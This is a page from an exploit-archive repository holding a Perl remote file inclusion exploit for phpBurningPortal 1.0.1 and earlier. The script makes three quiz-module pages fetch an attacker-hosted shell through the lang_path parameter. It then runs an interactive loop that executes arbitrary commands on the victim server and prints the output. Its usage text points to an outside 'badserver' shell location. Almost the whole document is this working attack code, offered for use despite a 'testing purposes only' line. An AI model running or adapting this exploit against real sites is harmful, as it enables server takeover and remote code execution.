forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path1000.txt
99 lines (82 loc) · 2.14 KB
/
1000.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
phpBurningPortal <= 1.0.1 (lang_path) Remote File Include Exploit
=================================================================
#!/usr/bin/perl
use LWP::UserAgent;
use LWP::Simple;
$target = @ARGV[0];
$shellsite = @ARGV[1];
$shellcmd = @ARGV[2];
$fileno = @ARGV[3];
if(!$target || !$shellsite)
{
usage();
}
header();
if ($fileno eq 1)
{
$file = "quest_delete.php?lang_path=";
}
elsif ($fileno eq 2)
{
$file = "quest_edit.php?lang_path=";
}
elsif ($fileno eq 3)
{
$file = "quest_news.php?lang_path=";
}
else
{
$file = "quest_delete.php?lang_path=";
}
print "[cmd]\$";
$cmd = <STDIN>;
while ($cmd !~ "exit")
{
$xpl = LWP::UserAgent->new() or die;
$req =
HTTP::Request->new(GET=>$target'/modules/includes/'.$file.$shellsite.'?&'.$shellcmd.'='.$cmd)
or die("\n\n Failed to connect.");
$res = $xpl->request($req);
$r = $res->content;
$r =~ tr/[\n]/[ê]/;
if (@ARGV[4] eq "-r")
{
print $r;
}
print "[cmd]\$";
$cmd = <STDIN>;
}
sub header()
{
print q
{
########################################################################
phpBurningPortal quiz-modul-1.0.1 - Remote File Include Exploit
Vulnerability discovered and exploit by r0ut3r
For portal administrator testing purposes only!
########################################################################
};
}
sub usage()
{
header();
print q
{
########################################################################
Usage:
perl q_xpl.pl <Target website> <Shell Location> <CMD Variable> <No> <r>
<Target Website> - Path to target eg: www.qvuln.target.com
<Shell Location> - Path to shell eg: www.badserver.com/s.txt
<CMD Variable> - Shell command variable name eg: cmd
<No> - File number, corresponding to:
1: quest_delete.php
2: quest_edit.php
3: quest_news.php
<r> - Show output from shell
Example:
perl a.pl http://localhost http://localhost/s.txt cmd 1 -r
########################################################################
};
exit();
}